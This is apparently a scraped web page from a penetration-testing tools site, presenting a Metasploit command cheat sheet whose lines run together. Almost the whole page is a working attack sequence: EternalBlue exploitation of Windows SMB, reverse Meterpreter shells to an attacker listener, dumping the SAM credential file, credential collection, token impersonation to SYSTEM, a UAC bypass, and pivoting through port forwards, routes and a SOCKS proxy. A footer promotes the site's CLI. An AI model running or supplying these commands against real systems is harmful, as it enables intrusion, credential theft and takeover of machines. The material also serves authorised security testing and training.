$loading...
Complete Metasploit reference for msfconsole, Meterpreter, session management, privilege escalation, and post-exploitation. (40 payloads)
msfconsole -qsearch type:exploit platform:windows name:smbuse exploit/windows/smb/ms17_010_eternalblueinfoshow optionsset RHOSTS 10.10.10.10set LHOST 10.10.14.2set LPORT 4444setg LHOST 10.10.14.2run
exploitcheckbackshow payloadsset payload windows/x64/meterpreter/reverse_tcpset payload linux/x86/meterpreter/reverse_tcpset payload windows/meterpreter/reverse_httpsuse multi/handler
set payload windows/x64/meterpreter/reverse_tcp
run -jsysinfogetuid
getpidpsmigrate <pid>shellupload /local/file.exe C:\\Windows\\Temp\\file.exedownload C:\\Windows\\System32\\SAM /tmp/hashdumprun post/windows/gather/credentials/credential_collectorportfwd add -l 3389 -p 3389 -r 192.168.1.100background
Ctrl+Zgetsystemuse post/multi/recon/local_exploit_suggester
runload incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
runsessions -lsessions -i 1sessions -k 1sessions -u 1jobs -l
jobs -k 1route add 192.168.1.0/24 1use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -juse post/multi/manage/autoroute
set SESSION 1
runLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides